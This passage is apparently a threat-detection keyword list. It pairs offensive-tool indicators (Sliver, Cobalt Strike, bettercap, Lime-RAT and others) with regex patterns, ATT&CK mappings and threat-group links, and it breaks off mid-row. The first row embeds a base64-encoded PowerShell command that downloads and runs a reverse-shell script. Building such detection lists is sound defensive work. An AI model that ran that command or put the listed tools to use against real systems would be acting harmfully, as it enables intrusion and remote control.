"*aQBlAHgAIAAoAE4AZwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMgAvAHIAZQB2AC4AcABzADEAJwApAA*",".{0,1000}aQBlAHgAIAAoAE4AZwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMgAvAHIAZQB2AC4AcABzADEAJwApAA.{0,1000}","offensive_tool_keyword","JustEvadeBro","JustEvadeBro a cheat sheet which will aid you through AMSI/AV evasion & bypasses.","T1562.001 - T1055.012 - T1218.011","TA0005 - TA0040 - TA0010","N/A","N/A","Defense Evasion","https://github.com/sinfulz/JustEvadeBro","1","0","N/A","N/A","8","4","309","25","2024-08-21T23:10:08Z","2021-05-11T06:26:10Z","34041"
"*archerysec*",".{0,1000}archerysec.{0,1000}","offensive_tool_keyword","archerysec","Archery is an opensource vulnerability assessment and management tool which helps developers and pentesters to perform scans and manage vulnerabilities. Archery uses popular opensource tools to perform comprehensive scanning for web application and network. It also performs web application dynamic authenticated scanning and covers the whole applications by using selenium. The developers can also utilize the tool for implementation of their DevOps CI/CD environment.","T1190 - T1082 - T1518","TA0003 - TA0008","N/A","N/A","Framework","https://github.com/archerysec/archerysec","1","0","N/A","N/A","N/A","10","2344","512","2024-10-08T12:39:37Z","2017-12-04T12:42:54Z","34042"
"*archive-*.kali.org/*",".{0,1000}archive\-.{0,1000}\.kali\.org\/.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A","34043"
"*archive.torproject.org*",".{0,1000}archive\.torproject\.org.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","34044"
"*ArchStrike*",".{0,1000}ArchStrike.{0,1000}","offensive_tool_keyword","archstrike","Arch Linux repo containing lots of exploitation tools for pentesters","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://archstrike.org/","1","1","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","34045"
"*ares.py runserver*",".{0,1000}ares\.py\srunserver.{0,1000}","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","0","N/A","N/A","10","10","1588","477","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z","34046"
"*ares-master.zip*",".{0,1000}ares\-master\.zip.{0,1000}","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","1","N/A","N/A","10","10","1588","477","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z","34047"
"*arget13/DDexec*",".{0,1000}arget13\/DDexec.{0,1000}","offensive_tool_keyword","Ddexec","A technique to run binaries filelessly and stealthily on Linux by ""overwriting"" the shell's process with another.","T1055.008 - T1106 - T1059.004","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/arget13/DDexec","1","1","#linux","N/A","9","9","830","88","2025-03-21T17:51:04Z","2022-01-27T12:52:10Z","34048"
"*ArgFuscator.net/archive/refs/heads/*",".{0,1000}ArgFuscator\.net\/archive\/refs\/heads\/.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","1","N/A","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","34049"
"*ArgFuscator.net-main*",".{0,1000}ArgFuscator\.net\-main.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","0","N/A","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","34050"
"*Args_Invoke_Kerberoast*",".{0,1000}Args_Invoke_Kerberoast.{0,1000}","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","Conti - APT29","Discovery","https://github.com/tevora-threat/SharpView/","1","0","N/A","N/A","10","10","1032","196","2024-03-22T16:34:09Z","2018-07-24T21:15:04Z","34051"
"*ArgusCrawler/1.0*",".{0,1000}ArgusCrawler\/1\.0.{0,1000}","offensive_tool_keyword","Argus","Information Gathering Toolkit","T1590.001 - T1590.002 - T1595.003 - T1016 - T1046 - T1590.005","TA0043 - TA0007","N/A","N/A","Reconnaissance","https://github.com/jasonxtn/Argus","1","0","#useragent","N/A","4","10","1951","210","2024-10-08T19:04:27Z","2024-10-01T22:13:51Z","34052"
"*ArgusDataLeakChecker/1.0*",".{0,1000}ArgusDataLeakChecker\/1\.0.{0,1000}","offensive_tool_keyword","Argus","Information Gathering Toolkit","T1590.001 - T1590.002 - T1595.003 - T1016 - T1046 - T1590.005","TA0043 - TA0007","N/A","N/A","Reconnaissance","https://github.com/jasonxtn/Argus","1","0","#useragent","N/A","4","10","1951","210","2024-10-08T19:04:27Z","2024-10-01T22:13:51Z","34053"
"*Argus-Scanner/1.0*",".{0,1000}Argus\-Scanner\/1\.0.{0,1000}","offensive_tool_keyword","Argus","Information Gathering Toolkit","T1590.001 - T1590.002 - T1595.003 - T1016 - T1046 - T1590.005","TA0043 - TA0007","N/A","N/A","Reconnaissance","https://github.com/jasonxtn/Argus","1","0","#useragent","N/A","4","10","1951","210","2024-10-08T19:04:27Z","2024-10-01T22:13:51Z","34054"
"*ARME Attack: Not Running!*",".{0,1000}ARME\sAttack\:\sNot\sRunning!.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","N/A","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","34055"
"*armitage.exe*",".{0,1000}armitage\.exe.{0,1000}","offensive_tool_keyword","armitage","Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets. recommends exploits and exposes the advanced capabilities of the framework ","T1210 - T1059.003 - T1547.001 - T1057 - T1046 - T1562.001 - T1071.001 - T1060 - T1573.002","TA0002 - TA0008 - TA0005 - TA0007 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/r00t0v3rr1d3/armitage","1","1","N/A","N/A","N/A","2","129","32","2022-12-06T00:17:23Z","2022-01-23T17:32:01Z","34056"
"*armory install *",".{0,1000}armory\sinstall\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","34057"
"*armory install .net-execute*",".{0,1000}armory\sinstall\s\.net\-execute.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","34058"
"*armory install .net-pivot*",".{0,1000}armory\sinstall\s\.net\-pivot.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","34059"
"*armory install .net-recon*",".{0,1000}armory\sinstall\s\.net\-recon.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","34060"
"*armory install situational-awareness*",".{0,1000}armory\sinstall\ssituational\-awareness.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","34061"
"*armory install windows-bypass*",".{0,1000}armory\sinstall\swindows\-bypass.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","34062"
"*armory install windows-pivot*",".{0,1000}armory\sinstall\swindows\-pivot.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","34063"
"*Arno0x/DBC2*",".{0,1000}Arno0x\/DBC2.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","BlackCat - Scattered Spider*","C2","https://github.com/Arno0x/DBC2","1","1","N/A","N/A","10","10","295","86","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z","34064"
"*Arno0x/DNSExfiltrator*",".{0,1000}Arno0x\/DNSExfiltrator.{0,1000}","offensive_tool_keyword","DNSExfiltrator","DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.","T1041 - T1048","TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/Arno0x/DNSExfiltrator","1","1","N/A","N/A","10","9","867","188","2024-04-29T20:20:43Z","2017-12-20T13:58:09Z","34065"
"*Arno0x/EmbedInHTML*",".{0,1000}Arno0x\/EmbedInHTML.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","1","N/A","N/A","N/A","5","485","119","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z","34066"
"*Arno0x/NtlmRelayToEWS*",".{0,1000}Arno0x\/NtlmRelayToEWS.{0,1000}","offensive_tool_keyword","NtlmRelayToEWS","ntlmRelayToEWS is a tool for performing ntlm relay attacks on Exchange Web Services (EWS)","T1212 - T1557 - T1040 - T1078","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/Arno0x/NtlmRelayToEWS","1","1","N/A","N/A","10","4","331","60","2018-01-15T12:48:02Z","2017-10-13T18:00:50Z","34067"
"*Arno0x/WebDavC2*",".{0,1000}Arno0x\/WebDavC2.{0,1000}","offensive_tool_keyword","WebDavC2","WebDavC2 is a PoC of using the WebDAV protocol with PROPFIND only requests to serve as a C2 communication channel between an agent. running on the target system. and a controller acting as the actuel C2 server.","T1571 - T1210.001 - T1190","TA0003 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Arno0x/WebDavC2","1","0","N/A","N/A","10","10","119","37","2019-08-27T06:51:42Z","2017-09-07T14:00:28Z","34068"
"*arp.spoof on*",".{0,1000}arp\.spoof\son.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 -  BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","0","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","34069"
"*arp.spoof.*",".{0,1000}arp\.spoof\..{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 -  BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","1","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","34070"
"*arp.spoof.targets*",".{0,1000}arp\.spoof\.targets.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 -  BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","1","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","34071"
"*arp_mitm.py*",".{0,1000}arp_mitm\.py.{0,1000}","offensive_tool_keyword","red-python-scripts","random networking exploitation scirpts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","N/A","8","10","2098","1599","2024-10-22T13:31:06Z","2021-01-07T16:11:52Z","34072"
"*arp_spoof.*",".{0,1000}arp_spoof\..{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 -  BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","1","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","34073"
"*arpspoof -i *",".{0,1000}arpspoof\s\-i\s.{0,1000}","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","0","N/A","N/A","9","10","1423","323","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z","34074"
"*ArpSpoofer*",".{0,1000}ArpSpoofer.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 -  BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","1","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","34075"
"*arpspoofing.py *",".{0,1000}arpspoofing\.py\s.{0,1000}","offensive_tool_keyword","arpspoofing","arp spoofing scripts","T1595","TA0001","N/A","N/A","Sniffing & Spoofing","https://github.com/luijait/arpspoofing","1","0","N/A","network exploitation tool","N/A","1","21","1","2022-03-10T04:44:36Z","2021-06-29T22:57:51Z","34076"
"*Arsenal needs TIOCSTI enable for running*",".{0,1000}Arsenal\sneeds\sTIOCSTI\senable\sfor\srunning.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","34077"
"*arsenal v* - Pentest command launcher*",".{0,1000}arsenal\sv.{0,1000}\s\-\sPentest\scommand\slauncher.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","34078"
"*arsenal_kit.cna*",".{0,1000}arsenal_kit\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","34079"
"*artifact.cna*",".{0,1000}artifact\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","34080"
"*artifact.cna*",".{0,1000}artifact\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","34081"
"*artifact.exe*",".{0,1000}artifact\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","default articfact name generated by cobaltsrike Cobalt Strike is threat emulation software. Execute targeted attacks against modern enterprises with one of the most powerful network attack kits available to penetration testers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","34082"
"*artifact.x64.exe*",".{0,1000}artifact\.x64\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 